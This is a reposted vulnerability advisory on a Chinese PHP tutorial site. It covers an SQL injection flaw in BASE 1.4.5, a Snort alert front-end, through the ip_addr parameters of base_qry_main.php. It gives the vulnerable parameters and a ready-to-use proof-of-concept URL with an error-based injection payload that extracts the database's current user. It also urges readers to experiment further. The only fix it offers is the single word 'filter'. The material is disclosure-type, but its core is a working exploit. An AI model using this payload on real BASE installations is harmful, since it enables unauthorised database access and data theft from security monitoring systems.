网站地图    收藏   

主页 > 后端 > 网站安全 >

BASE 1.4.5 (base_qry_main.php t_view) SQL注射缺陷及修复

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 标题: BASE 1.4.5 SQL Injection Vulnerability作者: a.kadir altan (testpenter_AT_gmail.com)下载地址: http://base.secureideas.net影响版本: 1.4.5测试平台: PHP##########################BASE ......

标题: BASE 1.4.5 SQL Injection Vulnerability
作者: a.kadir altan (testpenter_AT_gmail.com)
下载地址: http://base.secureideas.net
影响版本: 1.4.5
测试平台: PHP
##########################
BASE Snort Analysis Front-end SQLi Vulnerability
Vulnerable parameters:
ip_addr[0][1]
ip_addr[0][2]
ip_addr[0][9]
问题地址:
http://www.2cto.com /base_qry_main.php?new=2&num_result_rows=-1&submit=Query%20DB¤t_view=-1&ip_addr_cnt=1&ip_addr[0][0]=%20&ip_addr[0][1]=ip_dst&ip_addr[0][2]==&ip_addr[0][3]=11.11.11.11&ip_addr[0][8]=%20&ip_addr[0][9]=%20<SQLi HERE>
PoC:
http://www.2cto.com /base_qry_main.php?new=2&num_result_rows=-1&submit=Query%20DB¤t_view=-1&ip_addr_cnt=1&ip_addr[0][0]=%20&ip_addr[0][1]=ip_dst&ip_addr[0][2]==&ip_addr[0][3]=11.11.11.11&ip_addr[0][8]=%20&ip_addr[0][9]=%20)%20AND%20(SELECT%208543%20FROM(SELECT%20COUNT(*),CONCAT(0x3a796d723a,(MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,50)),0x3a6479783a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20(5635=5635
Play with ip_addr[x][y], including removal.
 
修复:
过滤
##########################
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论